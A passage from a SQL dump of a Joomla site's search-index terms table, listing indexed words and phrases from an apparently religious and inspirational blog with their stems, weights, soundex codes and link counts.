(1088, 'mind on', 'mind on', 0, 1, 1.2333, 'M350', 2, '*'),
(1089, 'mind on the', 'mind on the', 0, 1, 1.3667, 'M353', 2, '*'),
(1090, 'moment', 'moment', 0, 0, 0.4, 'M300', 4, '*'),
(1091, 'moment never', 'moment never', 0, 1, 1.4, 'M3516', 2, '*'),
(1092, 'moment never be', 'moment never be', 0, 1, 1.5, 'M35161', 2, '*'),
(1093, 'never', 'never', 0, 0, 0.3333, 'N160', 19, '*'),
(1094, 'never allow', 'never allow', 0, 1, 1.3667, 'N164', 3, '*'),
(1095, 'never allow yourself', 'never allow yourself', 0, 1, 1.6667, 'N1646241', 2, '*'),
(1096, 'never be', 'never be', 0, 1, 1.2667, 'N161', 3, '*'),
(1097, 'never be bullied', 'never be bullied', 0, 1, 1.5333, 'N16143', 2, '*'),
(1098, 'no', 'no', 0, 0, 0.1333, 'N000', 31, '*'),
(1099, 'no one\'s', 'no one', 0, 1, 1.2667, 'N200', 2, '*'),
(1100, 'no one\'s definition', 'no one definition', 0, 1, 1.6333, 'N231535', 2, '*'),
(1101, 'not dream', 'not dream', 0, 1, 1.3, 'N365', 2, '*'),
(1102, 'not dream of', 'not dream of', 0, 1, 1.4, 'N3651', 2, '*'),
(1103, 'not dwell', 'not dwell', 0, 1, 1.3, 'N340', 2, '*'),
(1104, 'not dwell in', 'not dwell in', 0, 1, 1.4, 'N345', 2, '*'),
(1105, 'of the future', 'of the future', 0, 1, 1.4333, 'O13136', 2, '*'),
(1106, 'of your life', 'of your life', 0, 1, 1.4, 'O1641', 10, '*'),
(1107, 'on the', 'on the', 0, 1, 1.2, 'O530', 27, '*'),
(1108, 'on the present', 'on the present', 0, 1, 1.4667, 'O5316253', 2, '*'),
(1109, 'one\'s', 'on', 0, 0, 0.3333, 'O520', 3, '*'),
(1110, 'one\'s definition', 'on definition', 0, 1, 1.5333, 'O5231535', 2, '*'),
(1111, 'one\'s definition of', 'on definition of', 0, 1, 1.6333, 'O52315351', 2, '*'),
(1112, 'past', 'past', 0, 0, 0.2667, 'P230', 6, '*'),
(1113, 'past do', 'past do', 0, 1, 1.2333, 'P230', 2, '*'),
(1114, 'past do not', 'past do not', 0, 1, 1.3667, 'P2353', 2, '*'),
(1115, 'present', 'present', 0, 0, 0.4667, 'P6253', 3, '*'),
(1116, 'present moment', 'present moment', 0, 1, 1.4667, 'P625353', 2, '*'),
(1117, 'present moment never', 'present moment never', 0, 1, 1.6667, 'P625353516', 2, '*'),
(1118, 'silence', 'silenc', 0, 0, 0.4667, 'S452', 2, '*'),
(1119, 'silence never', 'silenc never', 0, 1, 1.4333, 'S452516', 2, '*'),
(1120, 'silence never allow', 'silenc never allow', 0, 1, 1.6333, 'S4525164', 2, '*'),
(1122, 'the future', 'the future', 0, 1, 1.3333, 'T136', 8, '*'),
(1123, 'the future concentrate', 'the future concentrate', 0, 1, 1.7333, 'T1362525363', 2, '*'),
(1124, 'the mind', 'the mind', 0, 1, 1.2667, 'T530', 2, '*'),
(1125, 'the mind on', 'the mind on', 0, 1, 1.3667, 'T535', 2, '*'),
(1126, 'the past', 'the past', 0, 1, 1.2667, 'T123', 5, '*'),
(1127, 'the past do', 'the past do', 0, 1, 1.3667, 'T123', 2, '*'),
(1128, 'the present', 'the present', 0, 1, 1.3667, 'T16253', 2, '*'),
(1129, 'the present moment', 'the present moment', 0, 1, 1.6, 'T1625353', 2, '*'),
(1130, 'to be', 'to be', 0, 1, 1.1667, 'T100', 38, '*'),
(1131, 'to be made', 'to be made', 0, 1, 1.3333, 'T153', 2, '*'),
(1132, 'value', 'valu', 0, 0, 0.3333, 'V400', 8, '*'),
(1133, 'value 1', 'valu 1', 0, 1, 1.2333, 'V400', 2, '*'),
(1134, 'victim', 'victim', 0, 0, 0.4, 'V235', 2, '*'),
(1135, 'victim accept', 'victim accept', 0, 1, 1.4333, 'V235213', 2, '*'),
(1136, 'victim accept no', 'victim accept no', 0, 1, 1.5333, 'V2352135', 2, '*'),
(1137, 'your life define', 'your life define', 0, 1, 1.5333, 'Y641315', 3, '*'),
(1138, 'yourself don\'t', 'yourself don', 0, 1, 1.4667, 'Y6241353', 2, '*'),
(1139, 'yourself don\'t go', 'yourself don go', 0, 1, 1.5667, 'Y62413532', 2, '*'),
(1140, 'yourself to', 'yourself to', 0, 1, 1.3667, 'Y62413', 9, '*'),
(1141, 'yourself to be', 'yourself to be', 0, 1, 1.4667, 'Y624131', 3, '*'),
(1182, '10', '10', 0, 0, 0.2, '', 24, '*'),
(1187, '3', '3', 0, 0, 0.1, '', 24, '*'),
(1196, '6', '6', 0, 0, 0.1, '', 28, '*'),
(1199, '60', '60', 0, 0, 0.2, '', 3, '*'),
(1202, '8', '8', 0, 0, 0.1, '', 25, '*'),
(1230, 'and light', 'and light', 0, 1, 1.3, 'A53423', 2, '*'),
(1239, 'at', 'at', 0, 0, 0.1333, 'A300', 39, '*'),
(1240, 'at a', 'at a', 0, 1, 1.1333, 'A300', 4, '*'),
(1274, 'built', 'built', 0, 0, 0.3333, 'B430', 3, '*'),
(1277, 'business', 'busi', 0, 0, 0.5333, 'B252', 8, '*'),
(1292, 'clean', 'clean', 0, 0, 0.3333, 'C450', 4, '*'),
(1293, 'clean and', 'clean and', 0, 1, 1.3, 'C453', 2, '*'),
(1322, 'contact', 'contact', 0, 0, 0.4667, 'C5323', 4, '*'),
(1328, 'copy', 'copi', 0, 0, 0.2667, 'C100', 2, '*'),
(1329, 'copy of', 'copi of', 0, 1, 1.2333, 'C100', 2, '*'),
(1334, 'cross', 'cross', 0, 0, 0.3333, 'C620', 6, '*'),
(1355, 'demo', 'demo', 0, 0, 0.2667, 'D500', 3, '*'),
(1388, 'error', 'error', 0, 0, 0.3333, 'E600', 4, '*'),
(1391, 'especially', 'especi', 0, 0, 0.6667, 'E2124', 6, '*'),
(1394, 'face', 'face', 0, 0, 0.2667, 'F200', 8, '*'),
(1420, 'for all', 'for all', 0, 1, 1.2333, 'F640', 3, '*'),
(1426, 'for you', 'for you', 0, 1, 1.2333, 'F600', 23, '*'),
(1427, 'for you to', 'for you to', 0, 1, 1.3333, 'F630', 9, '*'),
(1428, 'form', 'form', 0, 0, 0.2667, 'F650', 7, '*'),
(1436, 'get', 'get', 0, 0, 0.2, 'G300', 27, '*'),
(1466, 'images', 'imag', 0, 0, 0.4, 'I520', 3, '*'),
(1513, 'kinds', 'kind', 0, 0, 0.3333, 'K532', 5, '*'),
(1514, 'kinds of', 'kind of', 0, 1, 1.2667, 'K5321', 5, '*'),
(1519, 'light', 'light', 0, 0, 0.3333, 'L230', 6, '*'),
(1525, 'location', 'locat', 0, 0, 0.5333, 'L235', 3, '*'),
(1528, 'makes', 'make', 0, 0, 0.3333, 'M200', 14, '*'),
(1531, 'making', 'make', 0, 0, 0.4, 'M252', 7, '*'),
(1543, 'more', 'more', 0, 0, 0.2667, 'M600', 23, '*'),
(1551, 'much', 'much', 0, 0, 0.2667, 'M200', 12, '*'),
(1552, 'much more', 'much more', 0, 1, 1.3, 'M256', 3, '*'),
(1559, 'multiple', 'multipl', 0, 0, 0.5333, 'M4314', 3, '*'),
(1567, 'needs', 'need', 0, 0, 0.3333, 'N320', 6, '*'),
(1596, 'over', 'over', 0, 0, 0.2667, 'O160', 24, '*'),
(1619, 'pointer', 'pointer', 0, 0, 0.4667, 'P536', 2, '*'),
(1634, 'refresh', 'refresh', 0, 0, 0.4667, 'R162', 2, '*'),
(1637, 'released', 'releas', 0, 0, 0.5333, 'R423', 2, '*'),
(1641, 'results', 'result', 0, 0, 0.4667, 'R2432', 4, '*'),
(1674, 'style', 'style', 0, 0, 0.3333, 'S340', 5, '*'),
(1680, 'styles', 'style', 0, 0, 0.4, 'S342', 2, '*'),
(1702, 'template', 'templat', 0, 0, 0.5333, 'T5143', 2, '*'),
(1718, 'title', 'titl', 0, 0, 0.3333, 'T400', 4, '*'),
(1744, 'up to', 'up to', 0, 1, 1.1667, 'U130', 11, '*'),
(1746, 'used', 'us', 0, 0, 0.2667, 'U230', 5, '*'),
(1749, 'using', 'us', 0, 0, 0.3333, 'U252', 5, '*'),
(1763, 'video', 'video', 0, 0, 0.3333, 'V300', 2, '*'),
(1769, 'well', 'well', 0, 0, 0.2667, 'W400', 18, '*'),
(1772, 'which', 'which', 0, 0, 0.3333, 'W200', 23, '*'),
(1784, 'with', 'with', 0, 0, 0.2667, 'W300', 54, '*'),
(1803, 'working', 'work', 0, 0, 0.4667, 'W6252', 9, '*'),
(1808, 'you to', 'you to', 0, 1, 1.2, 'Y300', 30, '*'),
(2222, 'father\'s', 'father', 0, 0, 0.5333, 'F362', 37, '*'),
(2223, 'father\'s heart', 'father heart', 0, 1, 1.4667, 'F36263', 35, '*'),
(2232, 'heart', 'heart', 0, 0, 0.3333, 'H630', 44, '*'),
(2233, 'images demo', 'imag demo', 0, 1, 1.3667, 'I5235', 2, '*'),
(2259, 'type', 'type', 0, 0, 0.2667, 'T100', 3, '*'),
(2523, 'ayodele', 'ayodel', 0, 0, 0.4667, 'A340', 28, '*'),
(2542, 'olusola', 'olusola', 0, 0, 0.4667, 'O424', 39, '*'),
(2543, 'olusola ayodele', 'olusola ayodele', 0, 1, 1.5, 'O42434', 28, '*'),
(2544, 'rev', 'rev', 0, 0, 0.2, 'R100', 46, '*'),
(2545, 'rev olusola', 'rev olusola', 0, 1, 1.3667, 'R1424', 39, '*'),
(2546, 'rev olusola ayodele', 'rev olusola ayodele', 0, 1, 1.6333, 'R142434', 28, '*'),
(2584, 'father', 'father', 0, 0, 0.4, 'F360', 34, '*'),
(2585, 'father s', 'father s', 0, 1, 1.2667, 'F362', 29, '*'),
(2586, 'father s heart', 'father s heart', 0, 1, 1.4667, 'F36263', 27, '*'),
(2602, 's', 's', 0, 0, 0.0667, 'S000', 31, '*'),
(2603, 's heart', 's heart', 0, 1, 1.2333, 'S630', 27, '*'),
(2825, 'for the', 'for the', 0, 1, 1.2333, 'F630', 26, '*'),
(2879, 'possible', 'possibl', 0, 0, 0.5333, 'P214', 5, '*'),
(10326, '5', '5', 0, 0, 0.1, '', 23, '*'),
(10343, 'food', 'food', 0, 0, 0.2667, 'F300', 7, '*'),
(10362, 'music', 'music', 0, 0, 0.3333, 'M200', 2, '*'),
(10365, 'soul', 'soul', 0, 0, 0.2667, 'S400', 10, '*'),
(10369, 'the soul', 'the soul', 0, 1, 1.2667, 'T240', 2, '*'),
(10395, '6 you', '6 you', 0, 1, 1.1667, 'Y000', 2, '*'),
(10432, 'once', 'onc', 0, 0, 0.2667, 'O520', 11, '*'),
(10435, 'only', 'onli', 0, 0, 0.2667, 'O540', 26, '*'),
(10444, 'source', 'sourc', 0, 0, 0.4, 'S620', 5, '*'),
(10487, 'you only', 'you only', 0, 1, 1.2667, 'Y540', 2, '*'),
(11539, '4', '4', 0, 0, 0.1, '', 28, '*'),
(11540, '4 inspiration', '4 inspiration', 0, 1, 1.4333, 'I521635', 1, '*'),
(11541, '4 inspiration comes', '4 inspiration comes', 0, 1, 1.6333, 'I521635252', 1, '*'),
(11542, 'blog courtship', 'blog courtship', 0, 1, 1.4667, 'B426321', 1, '*'),
(11543, 'blog courtship marriage', 'blog courtship marriage', 0, 1, 1.7667, 'B426321562', 1, '*'),
(11544, 'comes', 'come', 0, 0, 0.3333, 'C520', 19, '*'),
(11545, 'comes from', 'come from', 0, 1, 1.3333, 'C52165', 1, '*'),
(11546, 'comes from within', 'come from within', 0, 1, 1.5667, 'C5216535', 1, '*'),
(11547, 'courtship', 'courtship', 0, 0, 0.6, 'C6321', 1, '*'),
(11548, 'courtship marriage', 'courtship marriage', 0, 1, 1.6, 'C6321562', 1, '*'),
(11549, 'courtship marriage item', 'courtship marriage item', 0, 1, 1.7667, 'C632156235', 1, '*'),
(11550, 'digital blog courtship', 'digit blog courtship', 0, 1, 1.7333, 'D2341426321', 1, '*'),
(11551, 'from', 'from', 0, 0, 0.2667, 'F650', 53, '*'),
(11552, 'from within', 'from within', 0, 1, 1.3667, 'F6535', 2, '*'),
(11553, 'inspiration', 'inspir', 0, 0, 0.7333, 'I521635', 3, '*'),
(11554, 'inspiration comes', 'inspir comes', 0, 1, 1.5667, 'I521635252', 1, '*'),
(11555, 'inspiration comes from', 'inspir comes from', 0, 1, 1.7333, 'I521635252165', 1, '*'),
(11556, 'item 4', 'item 4', 0, 1, 1.2, 'I350', 1, '*'),
(11557, 'item 4 inspiration', 'item 4 inspiration', 0, 1, 1.6, 'I3521635', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(11558, 'marriage', 'marriag', 0, 0, 0.5333, 'M620', 6, '*'),
(11559, 'marriage item', 'marriag item', 0, 1, 1.4333, 'M6235', 1, '*'),
(11560, 'marriage item 4', 'marriag item 4', 0, 1, 1.5, 'M6235', 1, '*'),
(11561, 'within', 'within', 0, 0, 0.4, 'W350', 6, '*'),
(11570, '2', '2', 0, 0, 0.1, '', 32, '*'),
(11578, 'kind', 'kind', 0, 0, 0.2667, 'K530', 7, '*'),
(11581, 'whenever', 'whenev', 0, 0, 0.5333, 'W516', 7, '*'),
(12608, '7', '7', 0, 0, 0.1, '', 26, '*'),
(12610, 'a child', 'a child', 0, 1, 1.2333, 'A243', 4, '*'),
(12611, 'a child of', 'a child of', 0, 1, 1.3333, 'A2431', 4, '*'),
(12615, 'a long', 'a long', 0, 1, 1.2, 'A452', 2, '*'),
(12621, 'about', 'about', 0, 0, 0.3333, 'A130', 22, '*'),
(12624, 'after', 'after', 0, 0, 0.3333, 'A136', 10, '*'),
(12627, 'after you', 'after you', 0, 1, 1.3, 'A136', 4, '*'),
(12637, 'all that', 'all that', 0, 1, 1.2667, 'A430', 5, '*'),
(12639, 'all that he', 'all that he', 0, 1, 1.3667, 'A430', 3, '*'),
(12642, 'all the', 'all the', 0, 1, 1.2333, 'A430', 15, '*'),
(12647, 'allows', 'allow', 0, 0, 0.4, 'A420', 2, '*'),
(12650, 'also', 'also', 0, 0, 0.2667, 'A420', 25, '*'),
(12653, 'always', 'alwai', 0, 0, 0.4, 'A420', 23, '*'),
(12656, 'an', 'an', 0, 0, 0.1333, 'A500', 35, '*'),
(12661, 'and even', 'and even', 0, 1, 1.2667, 'A5315', 3, '*'),
(12663, 'and keep', 'and keep', 0, 1, 1.2667, 'A5321', 2, '*'),
(12666, 'and stand', 'and stand', 0, 1, 1.3, 'A532353', 2, '*'),
(12668, 'and start', 'and start', 0, 1, 1.3, 'A532363', 4, '*'),
(12670, 'and that', 'and that', 0, 1, 1.2667, 'A530', 7, '*'),
(12671, 'and that is', 'and that is', 0, 1, 1.3667, 'A532', 3, '*'),
(12677, 'are doing', 'ar doing', 0, 1, 1.3, 'A6352', 4, '*'),
(12679, 'are just', 'ar just', 0, 1, 1.2667, 'A623', 2, '*'),
(12681, 'are some', 'ar some', 0, 1, 1.2667, 'A625', 7, '*'),
(12682, 'are some of', 'ar some of', 0, 1, 1.3667, 'A6251', 6, '*'),
(12689, 'arrive', 'arriv', 0, 0, 0.4, 'A610', 3, '*'),
(12692, 'as', 'as', 0, 0, 0.1333, 'A200', 40, '*'),
(12693, 'as a', 'as a', 0, 1, 1.1333, 'A200', 18, '*'),
(12694, 'as a child', 'as a child', 0, 1, 1.3333, 'A243', 3, '*'),
(12697, 'asking', 'ask', 0, 0, 0.4, 'A252', 3, '*'),
(12700, 'avoidable', 'avoid', 0, 0, 0.6, 'A1314', 2, '*'),
(12701, 'avoidable mistakes', 'avoid mistakes', 0, 1, 1.6, 'A13145232', 2, '*'),
(12703, 'be patient', 'be patient', 0, 1, 1.3333, 'B353', 3, '*'),
(12704, 'be patient and', 'be patient and', 0, 1, 1.4667, 'B35353', 3, '*'),
(12706, 'because', 'becaus', 0, 0, 0.4667, 'B200', 37, '*'),
(12711, 'believe you', 'believ you', 0, 1, 1.3667, 'B410', 2, '*'),
(12713, 'best', 'best', 0, 0, 0.2667, 'B230', 9, '*'),
(12716, 'better', 'better', 0, 0, 0.4, 'B360', 6, '*'),
(12719, 'bible', 'bibl', 0, 0, 0.3333, 'B400', 20, '*'),
(12720, 'bible says', 'bibl says', 0, 1, 1.3333, 'B420', 10, '*'),
(12723, 'books', 'book', 0, 0, 0.3333, 'B200', 4, '*'),
(12727, 'but after', 'but after', 0, 1, 1.3, 'B3136', 2, '*'),
(12731, 'calling', 'call', 0, 0, 0.4667, 'C452', 12, '*'),
(12732, 'calling and', 'call and', 0, 1, 1.3667, 'C45253', 2, '*'),
(12736, 'can obtain', 'can obtain', 0, 1, 1.3333, 'C5135', 2, '*'),
(12740, 'cause', 'caus', 0, 0, 0.3333, 'C000', 2, '*'),
(12743, 'child', 'child', 0, 0, 0.3333, 'C430', 8, '*'),
(12744, 'child of', 'child of', 0, 1, 1.2667, 'C431', 6, '*'),
(12745, 'child of god', 'child of god', 0, 1, 1.4, 'C43123', 5, '*'),
(12746, 'component', 'compon', 0, 0, 0.6, 'C5153', 85, '*'),
(12747, 'component k2', 'compon k2', 0, 1, 1.4, 'C51532', 62, '*'),
(12748, 'component k2 item', 'compon k2 item', 0, 1, 1.5667, 'C5153235', 62, '*'),
(12752, 'days', 'dai', 0, 0, 0.2667, 'D200', 13, '*'),
(12753, 'days to', 'dai to', 0, 1, 1.2333, 'D230', 2, '*'),
(12755, 'dealing', 'deal', 0, 0, 0.4667, 'D452', 2, '*'),
(12756, 'dealing with', 'deal with', 0, 1, 1.4, 'D4523', 2, '*'),
(12758, 'dealing with the', 'deal with the', 0, 1, 1.5333, 'D4523', 2, '*'),
(12759, 'destination', 'destin', 0, 0, 0.7333, 'D23535', 2, '*'),
(12764, 'develop', 'develop', 0, 0, 0.4667, 'D141', 7, '*'),
(12767, 'devil', 'devil', 0, 0, 0.3333, 'D140', 23, '*'),
(12770, 'did', 'did', 0, 0, 0.2, 'D000', 11, '*'),
(12783, 'divine', 'divin', 0, 0, 0.4, 'D150', 28, '*'),
(12785, 'do all', 'do all', 0, 1, 1.2, 'D400', 3, '*'),
(12786, 'do all that', 'do all that', 0, 1, 1.3667, 'D430', 2, '*'),
(12793, 'do is', 'do is', 0, 1, 1.1667, 'D200', 6, '*'),
(12794, 'do is a', 'do is a', 0, 1, 1.2333, 'D200', 2, '*'),
(12797, 'do them', 'do them', 0, 1, 1.2333, 'D500', 2, '*'),
(12800, 'do what', 'do what', 0, 1, 1.2333, 'D000', 6, '*'),
(12801, 'do what is', 'do what is', 0, 1, 1.3333, 'D200', 2, '*'),
(12802, 'doing', 'do', 0, 0, 0.3333, 'D520', 21, '*'),
(12807, 'done', 'done', 0, 0, 0.2667, 'D500', 7, '*'),
(12813, 'down', 'down', 0, 0, 0.2667, 'D500', 14, '*'),
(12821, 'even when', 'even when', 0, 1, 1.3, 'E150', 4, '*'),
(12822, 'even when you', 'even when you', 0, 1, 1.4333, 'E150', 3, '*'),
(12825, 'father has', 'father has', 0, 1, 1.3333, 'F362', 3, '*'),
(12832, 'for god', 'for god', 0, 1, 1.2333, 'F623', 4, '*'),
(12833, 'for god to', 'for god to', 0, 1, 1.3333, 'F623', 2, '*'),
(12834, 'for him', 'for him', 0, 1, 1.2333, 'F650', 7, '*'),
(12838, 'for you in', 'for you in', 0, 1, 1.3333, 'F650', 5, '*'),
(12839, 'giving', 'give', 0, 0, 0.4, 'G152', 8, '*'),
(12842, 'god', 'god', 0, 0, 0.2, 'G300', 54, '*'),
(12849, 'god has', 'god has', 0, 1, 1.2333, 'G320', 29, '*'),
(12850, 'god has placed', 'god has placed', 0, 1, 1.4667, 'G321423', 4, '*'),
(12851, 'god in', 'god in', 0, 1, 1.2, 'G350', 11, '*'),
(12852, 'god in the', 'god in the', 0, 1, 1.3333, 'G353', 2, '*'),
(12853, 'god is', 'god is', 0, 1, 1.2, 'G320', 22, '*'),
(12862, 'god requires', 'god requires', 0, 1, 1.4, 'G36262', 2, '*'),
(12866, 'god the', 'god the', 0, 1, 1.2333, 'G300', 8, '*'),
(12868, 'god to', 'god to', 0, 1, 1.2, 'G300', 10, '*'),
(12869, 'god to do', 'god to do', 0, 1, 1.3, 'G300', 2, '*'),
(12870, 'gotten', 'gotten', 0, 0, 0.4, 'G350', 2, '*'),
(12873, 'has', 'ha', 0, 0, 0.2, 'H200', 43, '*'),
(12874, 'has placed', 'ha placed', 0, 1, 1.3333, 'H21423', 5, '*'),
(12876, 'has prepared', 'ha prepared', 0, 1, 1.4, 'H216163', 3, '*'),
(12877, 'has prepared for', 'ha prepared for', 0, 1, 1.5333, 'H21616316', 3, '*'),
(12878, 'have done', 'have done', 0, 1, 1.3, 'H135', 2, '*'),
(12880, 'have gotten', 'have gotten', 0, 1, 1.3667, 'H1235', 2, '*'),
(12888, 'have you', 'have you', 0, 1, 1.2667, 'H100', 3, '*'),
(12890, 'having', 'have', 0, 0, 0.4, 'H152', 8, '*'),
(12893, 'he', 'he', 0, 0, 0.1333, 'H000', 48, '*'),
(12898, 'him', 'him', 0, 0, 0.2, 'H500', 36, '*'),
(12901, 'his', 'hi', 0, 0, 0.2, 'H200', 50, '*'),
(12902, 'his people', 'hi people', 0, 1, 1.3333, 'H214', 4, '*'),
(12904, 'i', 'i', 0, 0, 0.0667, 'I000', 36, '*'),
(12905, 'i believe', 'i believe', 0, 1, 1.3, 'I141', 3, '*'),
(12907, 'i have', 'i have', 0, 1, 1.2, 'I100', 12, '*'),
(12911, 'i want', 'i want', 0, 1, 1.2, 'I530', 9, '*'),
(12912, 'i want to', 'i want to', 0, 1, 1.3, 'I530', 6, '*'),
(12913, 'if you will', 'if you will', 0, 1, 1.3667, 'I140', 5, '*'),
(12922, 'impossible', 'imposs', 0, 0, 0.6667, 'I51214', 2, '*'),
(12925, 'in jesus\'', 'in jesus', 0, 1, 1.3, 'I520', 7, '*'),
(12926, 'in jesus\' name', 'in jesus name', 0, 1, 1.4667, 'I525', 7, '*'),
(12927, 'in one', 'in one', 0, 1, 1.2, 'I500', 3, '*'),
(12930, 'in this', 'in this', 0, 1, 1.2333, 'I532', 8, '*'),
(12934, 'in what', 'in what', 0, 1, 1.2333, 'I530', 2, '*'),
(12936, 'in your spirit', 'in your spirit', 0, 1, 1.4667, 'I562163', 2, '*'),
(12945, 'is about', 'is about', 0, 1, 1.2667, 'I213', 5, '*'),
(12949, 'is impossible', 'is impossible', 0, 1, 1.4333, 'I251214', 2, '*'),
(12955, 'is not a', 'is not a', 0, 1, 1.2667, 'I253', 5, '*'),
(12957, 'is required', 'is required', 0, 1, 1.3667, 'I26263', 2, '*'),
(12959, 'is right', 'is right', 0, 1, 1.2667, 'I2623', 3, '*'),
(12960, 'is right and', 'is right and', 0, 1, 1.4, 'I262353', 2, '*'),
(12964, 'is what', 'is what', 0, 1, 1.2333, 'I230', 16, '*'),
(12968, 'jesus\'', 'jesu', 0, 0, 0.4, 'J000', 8, '*'),
(12969, 'jesus\' name', 'jesu name', 0, 1, 1.3667, 'J500', 7, '*'),
(12970, 'journey', 'journei', 0, 0, 0.4667, 'J650', 12, '*'),
(12971, 'journey and', 'journei and', 0, 1, 1.3667, 'J653', 3, '*'),
(12973, 'just as', 'just as', 0, 1, 1.2333, 'J320', 2, '*'),
(12978, 'keep', 'keep', 0, 0, 0.2667, 'K100', 16, '*'),
(12987, 'know', 'know', 0, 0, 0.2667, 'K500', 25, '*'),
(12988, 'know that', 'know that', 0, 1, 1.3, 'K530', 11, '*'),
(12993, 'likely', 'like', 0, 0, 0.4, 'L240', 2, '*'),
(12996, 'lives', 'live', 0, 0, 0.3333, 'L120', 15, '*'),
(12999, 'long', 'long', 0, 0, 0.2667, 'L520', 6, '*'),
(13009, 'lord', 'lord', 0, 0, 0.2667, 'L630', 41, '*'),
(13014, 'many', 'mani', 0, 0, 0.2667, 'M000', 22, '*'),
(13015, 'many times', 'mani times', 0, 1, 1.3333, 'M352', 3, '*'),
(13017, 'mature', 'matur', 0, 0, 0.4, 'M360', 3, '*'),
(13022, 'may you', 'mai you', 0, 1, 1.2333, 'M000', 8, '*'),
(13024, 'mistakes', 'mistak', 0, 0, 0.5333, 'M232', 3, '*'),
(13031, 'must be', 'must be', 0, 1, 1.2333, 'M231', 12, '*'),
(13035, 'name', 'name', 0, 0, 0.2667, 'N000', 22, '*'),
(13036, 'need', 'need', 0, 0, 0.2667, 'N300', 21, '*'),
(13041, 'need of', 'need of', 0, 1, 1.2333, 'N310', 2, '*'),
(13043, 'need to', 'need to', 0, 1, 1.2333, 'N300', 16, '*'),
(13051, 'new', 'new', 0, 0, 0.2, 'N000', 11, '*'),
(13052, 'new year', 'new year', 0, 1, 1.2667, 'N600', 2, '*'),
(13054, 'not a', 'not a', 0, 1, 1.1667, 'N300', 6, '*'),
(13060, 'now', 'now', 0, 0, 0.2, 'N000', 22, '*'),
(13061, 'now and', 'now and', 0, 1, 1.2333, 'N300', 3, '*'),
(13065, 'now when', 'now when', 0, 1, 1.2667, 'N000', 2, '*'),
(13067, 'obtain', 'obtain', 0, 0, 0.4, 'O135', 4, '*'),
(13072, 'of god', 'of god', 0, 1, 1.2, 'O123', 42, '*'),
(13073, 'of god in', 'of god in', 0, 1, 1.3, 'O1235', 5, '*'),
(13077, 'of his', 'of his', 0, 1, 1.2, 'O120', 10, '*'),
(13081, 'of the books', 'of the books', 0, 1, 1.4, 'O1312', 2, '*'),
(13082, 'of the lord', 'of the lord', 0, 1, 1.3667, 'O13463', 15, '*'),
(13084, 'of you', 'of you', 0, 1, 1.2, 'O100', 9, '*'),
(13088, 'out', 'out', 0, 0, 0.2, 'O300', 32, '*'),
(13089, 'out your', 'out your', 0, 1, 1.2667, 'O360', 3, '*'),
(13091, 'patience', 'patienc', 0, 0, 0.5333, 'P352', 3, '*'),
(13096, 'patience is', 'patienc is', 0, 1, 1.3667, 'P352', 2, '*'),
(13101, 'patience that', 'patienc that', 0, 1, 1.4333, 'P3523', 2, '*'),
(13105, 'patient', 'patient', 0, 0, 0.4667, 'P353', 3, '*'),
(13106, 'patient and', 'patient and', 0, 1, 1.3667, 'P35353', 3, '*'),
(13111, 'people', 'peopl', 0, 0, 0.4, 'P400', 40, '*'),
(13118, 'people you', 'peopl you', 0, 1, 1.3333, 'P400', 2, '*'),
(13120, 'person to', 'person to', 0, 1, 1.3, 'P6253', 2, '*'),
(13122, 'place', 'place', 0, 0, 0.3333, 'P420', 22, '*'),
(13123, 'place of', 'place of', 0, 1, 1.2667, 'P421', 16, '*'),
(13125, 'placed', 'place', 0, 0, 0.4, 'P423', 8, '*'),
(13132, 'prepared', 'prepar', 0, 0, 0.5333, 'P6163', 8, '*'),
(13133, 'prepared for', 'prepar for', 0, 1, 1.4, 'P616316', 7, '*'),
(13134, 'prepared for you', 'prepar for you', 0, 1, 1.5333, 'P616316', 3, '*'),
(13135, 'promised', 'promis', 0, 0, 0.5333, 'P6523', 3, '*'),
(13138, 'putting', 'put', 0, 0, 0.4667, 'P352', 5, '*'),
(13141, 'race', 'race', 0, 0, 0.2667, 'R200', 3, '*'),
(13147, 'read', 'read', 0, 0, 0.2667, 'R300', 9, '*'),
(13148, 'read them', 'read them', 0, 1, 1.3, 'R350', 2, '*'),
(13150, 'receive', 'receiv', 0, 0, 0.4667, 'R210', 12, '*'),
(13151, 'receive the', 'receiv the', 0, 1, 1.3667, 'R213', 4, '*'),
(13153, 'required', 'requir', 0, 0, 0.5333, 'R263', 4, '*'),
(13156, 'requires', 'requir', 0, 0, 0.5333, 'R262', 3, '*'),
(13159, 'right', 'right', 0, 0, 0.3333, 'R230', 19, '*'),
(13160, 'right and', 'right and', 0, 1, 1.3, 'R2353', 3, '*'),
(13162, 'salvation', 'salvat', 0, 0, 0.6, 'S4135', 7, '*'),
(13163, 'salvation of', 'salvat of', 0, 1, 1.4, 'S41351', 3, '*'),
(13165, 'same', 'same', 0, 0, 0.2667, 'S500', 7, '*'),
(13168, 'says', 'sai', 0, 0, 0.2667, 'S000', 20, '*'),
(13174, 'seed', 'seed', 0, 0, 0.2667, 'S300', 4, '*'),
(13177, 'settle', 'settl', 0, 0, 0.4, 'S340', 3, '*'),
(13180, 'small', 'small', 0, 0, 0.3333, 'S540', 3, '*'),
(13183, 'so', 'so', 0, 0, 0.1333, 'S000', 36, '*'),
(13186, 'so that', 'so that', 0, 1, 1.2333, 'S300', 9, '*'),
(13187, 'so that you', 'so that you', 0, 1, 1.3667, 'S300', 5, '*'),
(13188, 'so you', 'so you', 0, 1, 1.2, 'S000', 4, '*'),
(13190, 'some of', 'some of', 0, 1, 1.2333, 'S510', 10, '*'),
(13191, 'some of the', 'some of the', 0, 1, 1.3667, 'S513', 5, '*'),
(13192, 'some things', 'some things', 0, 1, 1.3667, 'S5352', 3, '*'),
(13194, 'soon', 'soon', 0, 0, 0.2667, 'S500', 7, '*'),
(13197, 'sowing', 'sow', 0, 0, 0.4, 'S520', 2, '*'),
(13200, 'spirit', 'spirit', 0, 0, 0.4, 'S163', 28, '*'),
(13203, 'stamina', 'stamina', 0, 0, 0.4667, 'S350', 3, '*'),
(13206, 'stand', 'stand', 0, 0, 0.3333, 'S353', 13, '*'),
(13207, 'stand and', 'stand and', 0, 1, 1.3, 'S35353', 2, '*'),
(13213, 'start', 'start', 0, 0, 0.3333, 'S363', 18, '*'),
(13216, 'starting', 'start', 0, 0, 0.5333, 'S36352', 2, '*'),
(13219, 'step', 'step', 0, 0, 0.2667, 'S310', 11, '*'),
(13220, 'step into', 'step into', 0, 1, 1.3, 'S3153', 3, '*'),
(13228, 'take you', 'take you', 0, 1, 1.2667, 'T200', 7, '*'),
(13233, 'that god', 'that god', 0, 1, 1.2667, 'T230', 27, '*'),
(13234, 'that god has', 'that god has', 0, 1, 1.4, 'T232', 14, '*'),
